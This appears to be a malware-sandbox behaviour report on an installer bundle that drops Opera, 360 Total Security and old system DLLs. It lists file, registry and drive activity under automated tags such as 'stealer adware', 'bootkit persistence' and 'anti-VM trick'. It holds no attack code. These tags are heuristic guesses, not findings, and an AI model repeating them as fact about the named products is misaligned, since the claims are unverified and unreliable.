File opened (read-only) \??\D: C:\Users\Admin\AppData\Roaming\DRPSu\PROGRAMS\OperaXP.exe N/A
File opened (read-only) \??\D: C:\Users\Admin\AppData\Roaming\DRPSu\PROGRAMS\OperaXP.exe N/A
File opened (read-only) \??\E: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\n: C:\Program Files (x86)\360\Total Security\safemon\QHActiveDefense.exe N/A
File opened (read-only) \??\Y: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\D: C:\Users\Admin\AppData\Local\Temp\Opera Installer\opera_installer_20240503165131\installer.exe N/A
File opened (read-only) \??\F: C:\Users\Admin\AppData\Roaming\DRPSu\PROGRAMS\OperaBlink64_win7.exe N/A
File opened (read-only) \??\A: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\G: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\D: C:\Users\Admin\AppData\Roaming\DRPSu\PROGRAMS\OperaBlink64_win7.exe N/A
File opened (read-only) \??\k: C:\Program Files (x86)\360\Total Security\safemon\QHActiveDefense.exe N/A
File opened (read-only) \??\m: C:\Program Files (x86)\360\Total Security\safemon\QHActiveDefense.exe N/A
File opened (read-only) \??\F: C:\Users\Admin\AppData\Roaming\DRPSu\PROGRAMS\OperaXP.exe N/A
File opened (read-only) \??\S: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\r: C:\Program Files (x86)\360\Total Security\safemon\QHActiveDefense.exe N/A
File opened (read-only) \??\M: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\P: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\L: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\U: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\F: C:\Program Files (x86)\Opera\64.0.3417.73\installer.exe N/A
File opened (read-only) \??\l: C:\Program Files (x86)\360\Total Security\safemon\QHActiveDefense.exe N/A
File opened (read-only) \??\q: C:\Program Files (x86)\360\Total Security\safemon\QHActiveDefense.exe N/A
File opened (read-only) \??\K: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\X: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\h: C:\Program Files (x86)\360\Total Security\safemon\QHActiveDefense.exe N/A
File opened (read-only) \??\x: C:\Program Files (x86)\360\Total Security\safemon\QHActiveDefense.exe N/A
File opened (read-only) \??\F: C:\Program Files (x86)\360\Total Security\safemon\QHSafeTray.exe N/A
File opened (read-only) \??\I: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\F: C:\Users\Admin\AppData\Roaming\DRPSu\PROGRAMS\OperaXP.exe N/A
File opened (read-only) \??\F: C:\Users\Admin\AppData\Roaming\DRPSu\PROGRAMS\OperaBlink64_win7.exe N/A
File opened (read-only) \??\t: C:\Program Files (x86)\360\Total Security\safemon\QHActiveDefense.exe N/A
File opened (read-only) \??\y: C:\Program Files (x86)\360\Total Security\safemon\QHActiveDefense.exe N/A
File opened (read-only) \??\D: C:\Users\Admin\AppData\Roaming\DRPSu\PROGRAMS\OperaBlink64_win7.exe N/A
File opened (read-only) \??\j: C:\Program Files (x86)\360\Total Security\safemon\QHActiveDefense.exe N/A
File opened (read-only) \??\u: C:\Program Files (x86)\360\Total Security\safemon\QHActiveDefense.exe N/A

Installs/modifies Browser Helper Object

stealer adware
Description Indicator Process Target
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\Browser Helper Objects\{B69F34DD-F0F9-42DC-9EDD-957187DA688D}\NoExplorer = "1" C:\Windows\SysWOW64\regsvr32.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Explorer\Browser Helper Objects\{B69F34DD-F0F9-42DC-9EDD-957187DA688D} C:\Windows\SysWOW64\regsvr32.exe N/A

Maps connected drives based on registry

Description Indicator Process Target
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\services\Disk\Enum C:\Program Files (x86)\360\Total Security\safemon\QHSafeTray.exe N/A
Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\services\Disk\Enum\0 C:\Program Files (x86)\360\Total Security\safemon\QHSafeTray.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\services\Disk\Enum C:\Program Files (x86)\360\Total Security\safemon\QHActiveDefense.exe N/A
Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\services\Disk\Enum\0 C:\Program Files (x86)\360\Total Security\safemon\QHActiveDefense.exe N/A

Writes to the Master Boot Record (MBR)

bootkit persistence
Description Indicator Process Target
File opened for modification \??\PhysicalDrive0 C:\Users\Admin\AppData\Roaming\DRPSu\PROGRAMS\360tsNew.exe N/A
File opened for modification \??\PhysicalDrive0 C:\Program Files (x86)\1714755241_0\360TS_Setup.exe N/A
File opened for modification \??\PhysicalDrive0 C:\Program Files (x86)\360\Total Security\safemon\QHSafeTray.exe N/A
File opened for modification \??\PhysicalDrive0 C:\Program Files (x86)\360\Total Security\safemon\QHActiveDefense.exe N/A
File opened for modification \??\PhysicalDrive0 C:\Program Files (x86)\360\Total Security\safemon\PopWndLog.exe N/A
File opened for modification \??\PhysicalDrive0 C:\Program Files (x86)\360\Total Security\safemon\QHSafeTray.exe N/A

Checks system information in the registry

Description Indicator Process Target
Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\SystemInformation\SystemManufacturer C:\Program Files (x86)\360\Total Security\safemon\QHSafeTray.exe N/A

Drops file in System32 directory

Description Indicator Process Target
File opened for modification C:\Windows\SysWOW64\mfc70cht.dll C:\Windows\SysWOW64\compact.exe N/A
File opened for modification C:\Windows\system32\config\systemprofile\AppData\Roaming\Opera Software\Opera Stable\Crash Reports\metadata C:\Windows\TEMP\opera autoupdate\CProgram Files (x86)Opera\installing\installer.exe N/A
File opened for modification C:\Windows\SysWow64\xactengine3_2.dll C:\Windows\system32\xcopy.exe N/A
File opened for modification C:\Windows\SysWOW64\libeay32.dll C:\Windows\SysWOW64\cmd.exe N/A
File created C:\Windows\SysWow64\xactengine2_10.dll C:\Windows\system32\xcopy.exe N/A
File opened for modification C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\8890A77645B73478F5B1DED18ACBF795_C090A8C88B266C6FF99A97210E92B44D C:\Program Files (x86)\Opera\64.0.3417.73\opera_autoupdate.exe N/A
File created C:\Windows\System32\xactengine2_1.dll C:\Windows\system32\xcopy.exe N/A
File opened for modification C:\Windows\System32\XAudio2_4.dll C:\Windows\system32\xcopy.exe N/A
File created C:\Windows\SysWow64\d3dx10_34.dll C:\Windows\system32\xcopy.exe N/A
File opened for modification C:\Windows\SysWow64\d3dx9_29.dll C:\Windows\system32\xcopy.exe N/A
File opened for modification C:\Windows\SysWow64\xactengine2_2.dll C:\Windows\system32\xcopy.exe N/A
File created C:\Windows\SysWOW64\MSVCP70.DLL C:\Windows\SysWOW64\cmd.exe N/A
File created C:\Windows\SysWOW64\msvcr71.dll C:\Windows\SysWOW64\cmd.exe N/A
File created C:\Windows\System32\d3dx11_43.dll C:\Windows\system32\xcopy.exe N/A
File opened for modification C:\Windows\System32\d3dx11_43.dll C:\Windows\system32\xcopy.exe N/A
File opened for modification C:\Windows\SysWOW64\msmask32.ocx C:\Windows\SysWOW64\cmd.exe N/A
File created C:\Windows\SysWOW64\Vb40032.dll C:\Windows\SysWOW64\cmd.exe N/A
File opened for modification C:\Windows\System32\D3DX9_41.dll C:\Windows\system32\xcopy.exe N/A
File created C:\Windows\SysWow64\XAudio2_7.dll C:\Windows\system32\xcopy.exe N/A
File created C:\Windows\SysWOW64\comct332.ocx C:\Windows\SysWOW64\cmd.exe N/A
File opened for modification C:\Windows\SysWOW64\libssl-1_1.dll C:\Windows\SysWOW64\compact.exe N/A
File created C:\Windows\SysWOW64\MFC71ENU.DLL C:\Windows\SysWOW64\cmd.exe N/A
File created C:\Windows\SysWOW64\msvcr70.dll C:\Windows\SysWOW64\cmd.exe N/A
File opened for modification C:\Windows\System32\xinput1_2.dll C:\Windows\system32\xcopy.exe N/A
File created C:\Windows\SysWow64\xactengine2_2.dll C:\Windows\system32\xcopy.exe N/A
File created C:\Windows\System32\xactengine2_4.dll C:\Windows\system32\xcopy.exe N/A
File opened for modification C:\Windows\System32\XAPOFX1_5.dll C:\Windows\system32\xcopy.exe N/A
File opened for modification C:\Windows\SysWOW64\mfc70kor.dll C:\Windows\SysWOW64\cmd.exe N/A
File opened for modification C:\Windows\SysWOW64\msvbvm50.dll C:\Windows\SysWOW64\cmd.exe N/A
File created C:\Windows\system32\perfh007.dat C:\Windows\Microsoft.NET\Framework\v1.1.4322\aspnet_regiis.exe N/A
File created C:\Windows\System32\d3dx10_35.dll C:\Windows\system32\xcopy.exe N/A
File created C:\Windows\System32\xactengine2_2.dll C:\Windows\system32\xcopy.exe N/A
File opened for modification C:\Windows\SysWow64\x3daudio1_1.dll C:\Windows\system32\xcopy.exe N/A
File created C:\Windows\SysWow64\XAudio2_0.dll C:\Windows\system32\xcopy.exe N/A
File created C:\Windows\System32\d3dx10_36.dll C:\Windows\system32\xcopy.exe N/A
File opened for modification C:\Windows\System32\XAPOFX1_4.dll C:\Windows\system32\xcopy.exe N/A
File created C:\Windows\System32\D3DCompiler_40.dll C:\Windows\system32\xcopy.exe N/A
File opened for modification C:\Windows\SysWOW64\msflxgrd.ocx C:\Windows\SysWOW64\cmd.exe N/A
File created C:\Windows\System32\XAPOFX1_0.dll C:\Windows\system32\xcopy.exe N/A
File opened for modification C:\Windows\SysWOW64\MShflxgd.ocx C:\Windows\SysWOW64\cmd.exe N/A
File opened for modification C:\Windows\System32\xactengine3_3.dll C:\Windows\system32\xcopy.exe N/A
File created C:\Windows\System32\xactengine3_5.dll C:\Windows\system32\xcopy.exe N/A
File opened for modification C:\Windows\SysWow64\XAudio2_7.dll C:\Windows\system32\xcopy.exe N/A
File created C:\Windows\SysWOW64\MFC71CHS.DLL C:\Windows\SysWOW64\cmd.exe N/A
File created C:\Windows\SysWOW64\MFC71DEU.DLL C:\Windows\SysWOW64\cmd.exe N/A
File opened for modification C:\Windows\SysWOW64\msstdfmt.dll C:\Windows\SysWOW64\cmd.exe N/A
File opened for modification C:\Windows\SysWOW64\MSSTKPRP.DLL C:\Windows\SysWOW64\compact.exe N/A
File created C:\Windows\SysWOW64\URTTEMP\regtlib.exe C:\Windows\system32\msiexec.exe N/A
File created C:\Windows\System32\d3dx9_36.dll C:\Windows\system32\xcopy.exe N/A
File created C:\Windows\SysWow64\XAPOFX1_1.dll C:\Windows\system32\xcopy.exe N/A
File created C:\Windows\SysWow64\d3dx10_40.dll C:\Windows\system32\xcopy.exe N/A
File opened for modification C:\Windows\SysWow64\xactengine3_4.dll C:\Windows\system32\xcopy.exe N/A
File opened for modification C:\Windows\SysWOW64\comctl32.ocx C:\Windows\SysWOW64\cmd.exe N/A
File opened for modification C:\Windows\SysWOW64\msinet.ocx C:\Windows\SysWOW64\cmd.exe N/A
File created C:\Windows\system32\perfc010.dat C:\Windows\Microsoft.NET\Framework\v1.1.4322\aspnet_regiis.exe N/A
File created C:\Windows\System32\d3dx10_40.dll C:\Windows\system32\xcopy.exe N/A
File opened for modification C:\Windows\System32\x3daudio1_1.dll C:\Windows\system32\xcopy.exe N/A
File created C:\Windows\SysWOW64\MFC71u.dll C:\Windows\SysWOW64\cmd.exe N/A
File opened for modification C:\Windows\SysWOW64\libcrypto-1_1.dll C:\Windows\SysWOW64\compact.exe N/A
File opened for modification C:\Windows\SysWOW64\MFC71ESP.DLL C:\Windows\SysWOW64\compact.exe N/A
File opened for modification C:\Windows\System32\XAudio2_6.dll C:\Windows\system32\xcopy.exe N/A
File opened for modification C:\Windows\SysWOW64\mfc70ita.dll C:\Windows\SysWOW64\cmd.exe N/A
File opened for modification C:\Windows\System32\XAPOFX1_1.dll C:\Windows\system32\xcopy.exe N/A
File opened for modification C:\Windows\SysWOW64\tabctl32.ocx C:\Windows\SysWOW64\cmd.exe N/A

Checks for VirtualBox DLLs, possible anti-VM trick

Description Indicator Process Target
File opened (read-only) \??\VBoxMiniRdrDN C:\Program Files (x86)\360\Total Security\safemon\QHSafeTray.exe N/A

Drops file in Program Files directory

Description Indicator Process Target
File created C:\Program Files (x86)\Opera\64.0.3417.73\resources\ab_tests.json C:\Users\Admin\AppData\Roaming\DRPSu\PROGRAMS\OperaBlink64_win7.exe N/A
File created C:\Program Files (x86)\360\Total Security\i18n\vi\ipc\360netr.dat C:\Program Files (x86)\1714755241_0\360TS_Setup.exe N/A
File created C:\Program Files (x86)\360\Total Security\i18n\zh-TW\ipc\Sxin64.dll.locale C:\Program Files (x86)\1714755241_0\360TS_Setup.exe N/A
File created C:\Program Files (x86)\Opera\36.0.2130.80\localization\tr.pak C:\Users\Admin\AppData\Local\Temp\Opera Installer\opera_installer_20240503165131\installer.exe N/A
File created C:\Program Files (x86)\Opera\64.0.3417.73\resources\3BFDFA54-5DD6-4DFF-8B6C-C1715F306D6B.ico C:\Users\Admin\AppData\Roaming\DRPSu\PROGRAMS\OperaBlink64_win7.exe N/A
File created C:\Program Files (x86)\360\Total Security\i18n\it\safemon\CameraProtect\CameraGuard\bkg\pic_01.jpg C:\Program Files (x86)\1714755241_0\360TS_Setup.exe N/A
File created C:\Program Files (x86)\360\Total Security\config\tools\nodes\PremiumTheme.xml C:\Program Files (x86)\1714755241_0\360TS_Setup.exe N/A
File created C:\Program Files (x86)\360\Total Security\360NetBase64.dll C:\Program Files (x86)\1714755241_0\360TS_Setup.exe N/A
File created C:\Program Files (x86)\360\Total Security\i18n\tr\safemon\360procmon.dll.locale C:\Program Files (x86)\1714755241_0\360TS_Setup.exe N/A
File created C:\Program Files (x86)\360\Total Security\ipc\360boxmain.exe C:\Program Files (x86)\1714755241_0\360TS_Setup.exe N/A
File created C:\Program Files (x86)\360\Total Security\safemon\QHWatchdog.exe C:\Program Files (x86)\1714755241_0\360TS_Setup.exe N/A
File created C:\Program Files (x86)\360\Total Security\safemon\360scovec64.dll C:\Program Files (x86)\1714755241_0\360TS_Setup.exe N/A
File created C:\Program Files (x86)\360\Total Security\i18n\zh-CN\safemon\360SafeCamera.tpi.locale C:\Program Files (x86)\1714755241_0\360TS_Setup.exe N/A
File created C:\Program Files (x86)\360\Total Security\i18n\es\deepscan\cloudsec3.dll.locale C:\Program Files (x86)\1714755241_0\360TS_Setup.exe N/A
File created C:\Program Files (x86)\360\Total Security\softmgr\EaInstHelper.exe C:\Program Files (x86)\1714755241_0\360TS_Setup.exe N/A
File created C:\Program Files (x86)\Opera\64.0.3417.73\resources\default_partner_content.json C:\Users\Admin\AppData\Roaming\DRPSu\PROGRAMS\OperaBlink64_win7.exe N/A
File created C:\Program Files (x86)\360\Total Security\i18n\pl\deepscan\art.dat C:\Program Files (x86)\1714755241_0\360TS_Setup.exe N/A
File created C:\Program Files (x86)\360\Total Security\i18n\fr\safemon\bp.dat C:\Program Files (x86)\1714755241_0\360TS_Setup.exe N/A
File created C:\Program Files (x86)\360\Total Security\ipc\X64For32Lib.dll C:\Program Files (x86)\1714755241_0\360TS_Setup.exe N/A
File created C:\Program Files (x86)\Opera\79.0.4143.22\localization\zh-CN.pak C:\Windows\TEMP\opera autoupdate\CProgram Files (x86)Opera\installing\installer.exe N/A
File opened for modification C:\Program Files (x86)\Opera C:\Program Files (x86)\Opera\79.0.4143.22\installer.exe N/A
File created C:\Program Files (x86)\360\Total Security\config\tools\nodes\ScheduledClean.xml C:\Program Files (x86)\1714755241_0\360TS_Setup.exe N/A
File created C:\Program Files (x86)\360\Total Security\i18n\en\ipc\360netd.dat C:\Program Files (x86)\1714755241_0\360TS_Setup.exe N/A
File created C:\Program Files (x86)\360\Total Security\ipc\360hvm.dll C:\Program Files (x86)\1714755241_0\360TS_Setup.exe N/A
File created C:\Program Files (x86)\360\Total Security\Utils\SysCleaner.dll C:\Program Files (x86)\1714755241_0\360TS_Setup.exe N/A
File created C:\Program Files (x86)\Opera\79.0.4143.22\notification_helper.exe C:\Windows\TEMP\opera autoupdate\CProgram Files (x86)Opera\installing\installer.exe N/A
File created C:\Program Files (x86)\Opera\64.0.3417.73\localization\fi.pak C:\Users\Admin\AppData\Roaming\DRPSu\PROGRAMS\OperaBlink64_win7.exe N/A
File created C:\Program Files (x86)\360\Total Security\safemon\urllib.dat C:\Program Files (x86)\1714755241_0\360TS_Setup.exe N/A
File created C:\Program Files (x86)\360\Total Security\i18n\ru\safemon\chrome\360webshield.exe.locale C:\Program Files (x86)\1714755241_0\360TS_Setup.exe N/A
File created C:\Program Files (x86)\Opera\79.0.4143.22\resources\CFCE84E5-9A95-4B3F-B8E4-3E98CF7EE6C5.ico C:\Windows\TEMP\opera autoupdate\CProgram Files (x86)Opera\installing\installer.exe N/A
File created C:\Program Files (x86)\Opera\64.0.3417.73\launcher.exe C:\Users\Admin\AppData\Roaming\DRPSu\PROGRAMS\OperaBlink64_win7.exe N/A
File created C:\Program Files (x86)\360\Total Security\i18n\zh-CN\ipc\360netd.dat C:\Program Files (x86)\1714755241_0\360TS_Setup.exe N/A
File created C:\Program Files (x86)\360\Total Security\LeakFixHelper64.exe C:\Program Files (x86)\1714755241_0\360TS_Setup.exe N/A
File created C:\Program Files (x86)\360\Total Security\config\tools\nodes\360Central.xml C:\Program Files (x86)\1714755241_0\360TS_Setup.exe N/A
File created C:\Program Files (x86)\360\Total Security\deepscan\BlackMirror.dat C:\Program Files (x86)\1714755241_0\360TS_Setup.exe N/A
File created C:\Program Files (x86)\360\Total Security\i18n\it\ipc\Sxin64.dll.locale C:\Program Files (x86)\1714755241_0\360TS_Setup.exe N/A
File created C:\Program Files (x86)\360\Total Security\deepscan\rmt.exe C:\Program Files (x86)\1714755241_0\360TS_Setup.exe N/A
File created C:\Program Files (x86)\360\Total Security\i18n\ja\safemon\360procmon.dll.locale C:\Program Files (x86)\1714755241_0\360TS_Setup.exe N/A
File created C:\Program Files (x86)\360\Total Security\i18n\fr\safemon\udisk.locale C:\Program Files (x86)\1714755241_0\360TS_Setup.exe N/A
File created C:\Program Files (x86)\360\Total Security\Dumpuper.exe C:\Program Files (x86)\1714755241_0\360TS_Setup.exe N/A
File created C:\Program Files (x86)\360\Total Security\config\tools\nodes\DailyNews.xml C:\Program Files (x86)\1714755241_0\360TS_Setup.exe N/A
File created C:\Program Files (x86)\360\Total Security\config\tools\nodes\SysCleaner.xml C:\Program Files (x86)\1714755241_0\360TS_Setup.exe N/A
File created C:\Program Files (x86)\360\Total Security\i18n\de\deepscan\cloudsec3.dll.locale C:\Program Files (x86)\1714755241_0\360TS_Setup.exe N/A
File created C:\Program Files (x86)\Opera\79.0.4143.22\localization\sr.pak C:\Windows\TEMP\opera autoupdate\CProgram Files (x86)Opera\installing\installer.exe N/A
File created C:\Program Files (x86)\360\Total Security\i18n\hi\safemon\360SafeCamera.tpi.locale C:\Program Files (x86)\1714755241_0\360TS_Setup.exe N/A
File created C:\Program Files (x86)\360\Total Security\config\newui\themes\default\360searchlite\360searchlite_theme.ui C:\Program Files (x86)\1714755241_0\360TS_Setup.exe N/A
File created C:\Program Files (x86)\360\Total Security\Utils\PowerSaver.exe C:\Program Files (x86)\1714755241_0\360TS_Setup.exe N/A
File created C:\Program Files (x86)\Opera\Assets\70x70Logo.scale-100.png C:\Users\Admin\AppData\Local\Temp\Opera Installer\opera_installer_20240503165131\installer.exe N/A
File created C:\Program Files (x86)\360\Total Security\i18n\pl\safemon\chrome\360webshield.exe.locale C:\Program Files (x86)\1714755241_0\360TS_Setup.exe N/A
File created C:\Program Files (x86)\360\Total Security\i18n\zh-CN\deepscan\DsRes64.dll C:\Program Files (x86)\1714755241_0\360TS_Setup.exe N/A
File created C:\Program Files (x86)\Opera\64.0.3417.73\localization\ko.pak C:\Users\Admin\AppData\Roaming\DRPSu\PROGRAMS\OperaBlink64_win7.exe N/A
File created C:\Program Files (x86)\360\Total Security\i18n\zh-CN\safemon\Safemon64.dll.locale C:\Program Files (x86)\1714755241_0\360TS_Setup.exe N/A
File opened for modification C:\Program Files (x86)\360\Total Security\safemon\setting.ini C:\Program Files (x86)\360\Total Security\safemon\PopWndLog.exe N/A
File created C:\Program Files (x86)\Opera\64.0.3417.73\resources\FFF3F819-B6CE-4DE6-B4E4-8E2618ABC0D9.ico C:\Users\Admin\AppData\Roaming\DRPSu\PROGRAMS\OperaBlink64_win7.exe N/A
File created C:\Program Files (x86)\Opera\64.0.3417.73\opera_100_percent.pak C:\Users\Admin\AppData\Roaming\DRPSu\PROGRAMS\OperaBlink64_win7.exe N/A
File created C:\Program Files (x86)\360\Total Security\Utils\PopTip.exe C:\Program Files (x86)\1714755241_0\360TS_Setup.exe N/A
File created C:\Program Files (x86)\360\Total Security\safemon\wdui3.dll C:\Program Files (x86)\1714755241_0\360TS_Setup.exe N/A
File created C:\Program Files (x86)\Opera\79.0.4143.22\localization\te.pak C:\Windows\TEMP\opera autoupdate\CProgram Files (x86)Opera\installing\installer.exe N/A
File created C:\Program Files (x86)\360\Total Security\safemon\360hipsPopWnd.dll C:\Program Files (x86)\1714755241_0\360TS_Setup.exe N/A
File created C:\Program Files (x86)\360\Total Security\deepscan\ImAVEng.dll C:\Program Files (x86)\1714755241_0\360TS_Setup.exe N/A
File created C:\Program Files (x86)\360\Total Security\deepscan\BAPIDRV64_old.sys C:\Program Files (x86)\1714755241_0\360TS_Setup.exe N/A
File created C:\Program Files (x86)\Opera\64.0.3417.73\installer.exe C:\Users\Admin\AppData\Roaming\DRPSu\PROGRAMS\OperaBlink64_win7.exe N/A
File created C:\Program Files (x86)\Opera\64.0.3417.73\opera_125_percent.pak C:\Users\Admin\AppData\Roaming\DRPSu\PROGRAMS\OperaBlink64_win7.exe N/A
File created C:\Program Files (x86)\360\Total Security\sweeper\SysSweeper.dat C:\Program Files (x86)\1714755241_0\360TS_Setup.exe N/A

Drops file in Windows directory

Description Indicator Process Target
File opened for modification C:\Windows\assembly\GAC\Microsoft.Ink\1.7.2600.2180__31bf3856ad364e35\Microsoft.Ink.dll C:\Windows\system32\xcopy.exe N/A
File opened for modification C:\Windows\assembly\GAC\Microsoft.DirectX.Direct3DX\1.0.2902.0__31bf3856ad364e35\Microsoft.DirectX.Direct3DX.dll C:\Windows\system32\xcopy.exe N/A
File opened for modification C:\Windows\Installer\MSID17.tmp C:\Windows\system32\msiexec.exe N/A
File created C:\Windows\inf\ASP.NET_1.1.4322\0000\aspnet_perf.ini C:\Windows\Microsoft.NET\Framework\v1.1.4322\aspnet_regiis.exe N/A
File opened for modification C:\Windows\assembly\GAC\Microsoft.DirectX.Diagnostics\1.0.2902.0__31bf3856ad364e35\__AssemblyInfo__.ini C:\Windows\system32\xcopy.exe N/A
File created C:\Windows\Microsoft.NET\Framework\v1.1.4322\cscomp.dll C:\Windows\system32\msiexec.exe N/A
File created C:\Windows\Registration\{02D4B3F1-FD88-11D1-960D-00805FC79235}.{C141A17A-1964-4C74-8A51-D8015270D9CD}.crmlog C:\Windows\system32\dllhost.exe N/A
File created C:\Windows\assembly\tmp\HC70IMZT\IEHost.dll C:\Windows\system32\msiexec.exe N/A
File created C:\Windows\Microsoft.NET\DirectX for Managed Code\1.0.2902.0\Microsoft.DirectX.DirectDraw.xml C:\Windows\system32\xcopy.exe N/A
File opened for modification C:\Windows\Microsoft.NET\DirectX for Managed Code\1.0.2909.0\Microsoft.DirectX.Direct3DX.dll C:\Windows\system32\xcopy.exe N/A
File created C:\Windows\Microsoft.NET\Framework\v1.1.4322\ngen.exe C:\Windows\system32\msiexec.exe N/A
File opened for modification C:\Windows\Installer\MSIC84.tmp C:\Windows\system32\msiexec.exe N/A
File opened for modification C:\Windows\Installer\MSICE0.tmp C:\Windows\system32\msiexec.exe N/A
File opened for modification C:\Windows\Installer\MSIE42.tmp C:\Windows\system32\msiexec.exe N/A
File opened for modification C:\Windows\Installer\MSI1137.tmp C:\Windows\system32\msiexec.exe N/A
File opened for modification C:\Windows\System32 C:\Windows\system32\xcopy.exe N/A
File created C:\Windows\Microsoft.NET\Framework\v1.1.4322\mscorsvr.dll C:\Windows\system32\msiexec.exe N/A
File created C:\Windows\assembly\tmp\MS4YXC0R\System.Web.Mobile.dll C:\Windows\system32\msiexec.exe N/A
File created C:\Windows\inf\ASP.NET_1.1.4322\000A\aspnet_perf.ini C:\Windows\Microsoft.NET\Framework\v1.1.4322\aspnet_regiis.exe N/A
File opened for modification C:\Windows\Installer\MSID2A.tmp C:\Windows\system32\msiexec.exe N/A
File opened for modification C:\Windows\Installer\MSID4E.tmp C:\Windows\system32\msiexec.exe N/A
File opened for modification C:\Windows\Microsoft.NET\DirectX for Managed Code\1.0.2903.0\Microsoft.DirectX.Direct3DX.dll C:\Windows\system32\xcopy.exe N/A
File created C:\Windows\Microsoft.NET\DirectX for Managed Code\1.0.2911.0\Microsoft.DirectX.Direct3DX.dll C:\Windows\system32\xcopy.exe N/A
File created C:\Windows\Microsoft.NET\Framework\v1.1.4322\InstallUtil.exe C:\Windows\system32\msiexec.exe N/A
File created C:\Windows\Microsoft.NET\Framework\v1.1.4322\cvtres.exe.config C:\Windows\system32\msiexec.exe N/A
File opened for modification C:\Windows\Installer\MSIC28.tmp C:\Windows\system32\msiexec.exe N/A
File opened for modification C:\Windows\Installer\MSIDF6.tmp C:\Windows\system32\msiexec.exe N/A
File opened for modification C:\Windows\assembly\tmp\HC70IMZT\IEHost.dll C:\Windows\system32\msiexec.exe N/A
File opened for modification C:\Windows\Installer\MSI11A9.tmp C:\Windows\system32\msiexec.exe N/A
File created C:\Windows\assembly\GAC\Microsoft.DirectX.AudioVideoPlayback\1.0.2902.0__31bf3856ad364e35\__AssemblyInfo__.ini C:\Windows\system32\xcopy.exe N/A
File opened for modification C:\Windows\assembly\GAC\Microsoft.DirectX.Direct3DX\1.0.2908.0__31bf3856ad364e35 C:\Windows\system32\xcopy.exe N/A
File opened for modification C:\Windows\Microsoft.NET\DirectX for Managed Code\1.0.2902.0\Microsoft.DirectX.Diagnostics.xml C:\Windows\system32\xcopy.exe N/A
File created C:\Windows\assembly\tmp\Y8U05G4M\System.Web.Mobile.dll C:\Windows\Microsoft.NET\Framework\v1.1.4322\gacutil.exe N/A
File opened for modification C:\Windows\Installer\MSIE861.tmp C:\Windows\system32\msiexec.exe N/A
File created C:\Windows\Microsoft.NET\Framework\v1.1.4322\System.Runtime.Serialization.Formatters.Soap.dll C:\Windows\system32\msiexec.exe N/A
File created C:\Windows\inf\ASP.NET_1.1.4322\0804\aspnet_perf.ini C:\Windows\Microsoft.NET\Framework\v1.1.4322\aspnet_regiis.exe N/A
File created C:\Windows\Microsoft.NET\Framework\v1.1.4322\mscorlib.ldo C:\Windows\system32\msiexec.exe N/A
File opened for modification C:\Windows\Installer\MSI103A.tmp C:\Windows\system32\msiexec.exe N/A
File opened for modification C:\Windows\Installer\MSI11E8.tmp C:\Windows\system32\msiexec.exe N/A
File created C:\Windows\assembly\GAC\Microsoft.DirectX.DirectDraw\1.0.2902.0__31bf3856ad364e35\__AssemblyInfo__.ini C:\Windows\system32\xcopy.exe N/A
File created C:\Windows\Microsoft.NET\DirectX for Managed Code\1.0.2902.0\Microsoft.DirectX.AudioVideoPlayback.xml C:\Windows\system32\xcopy.exe N/A
File created C:\Windows\Microsoft.NET\Framework\v1.1.4322\1033\cscompui.dll C:\Windows\system32\msiexec.exe N/A
File created C:\Windows\assembly\tmp\9YM7HWFF\System.Messaging.dll C:\Windows\system32\msiexec.exe N/A
File opened for modification C:\Windows\assembly\GAC\Microsoft.DirectX.Direct3DX\1.0.2907.0__31bf3856ad364e35\Microsoft.DirectX.Direct3DX.dll C:\Windows\system32\xcopy.exe N/A
File opened for modification C:\Windows\Installer\MSID2B.tmp C:\Windows\system32\msiexec.exe N/A
File opened for modification C:\Windows\Installer\MSID9B.tmp C:\Windows\system32\msiexec.exe N/A
File opened for modification C:\Windows\Installer\MSI104C.tmp C:\Windows\system32\msiexec.exe N/A
File created C:\Windows\Microsoft.NET\Framework\v1.1.4322\config\enterprisesec.config.new C:\Windows\Microsoft.NET\Framework\v1.1.4322\RegSvcs.exe N/A
File opened for modification C:\Windows\Installer\MSID05.tmp C:\Windows\system32\msiexec.exe N/A
File opened for modification C:\Windows\Installer\MSIDE3.tmp C:\Windows\system32\msiexec.exe N/A
File created C:\Windows\Microsoft.NET\Framework\v1.1.4322\CustomMarshalers.dll C:\Windows\system32\msiexec.exe N/A
File created C:\Windows\Microsoft.NET\Framework\v1.1.4322\caspol.exe.config C:\Windows\system32\msiexec.exe N/A
File created C:\Windows\Microsoft.NET\Framework\v1.1.4322\mscormmc.dll C:\Windows\system32\msiexec.exe N/A
File opened for modification C:\Windows\Installer\MSIF69C.tmp C:\Windows\system32\msiexec.exe N/A
File opened for modification C:\Windows\Installer\MSI1085.tmp C:\Windows\system32\msiexec.exe N/A
File opened for modification C:\Windows\Installer\MSI1096.tmp C:\Windows\system32\msiexec.exe N/A
File opened for modification C:\Windows\assembly\GAC\Microsoft.DirectX.Direct3DX\1.0.2902.0__31bf3856ad364e35\__AssemblyInfo__.ini C:\Windows\system32\xcopy.exe N/A
File created C:\Windows\Microsoft.NET\DirectX for Managed Code\1.0.2903.0\Microsoft.DirectX.Direct3DX.xml C:\Windows\system32\xcopy.exe N/A
File created C:\Windows\assembly\tmp\GAQQ01HF\System.Data.dll C:\Windows\system32\msiexec.exe N/A
File created C:\Windows\Microsoft.NET\Framework\v1.1.4322\1033\alinkui.dll C:\Windows\system32\msiexec.exe N/A
File created C:\Windows\Microsoft.NET\Framework\v1.1.4322\Microsoft.JScript.dll C:\Windows\system32\msiexec.exe N/A
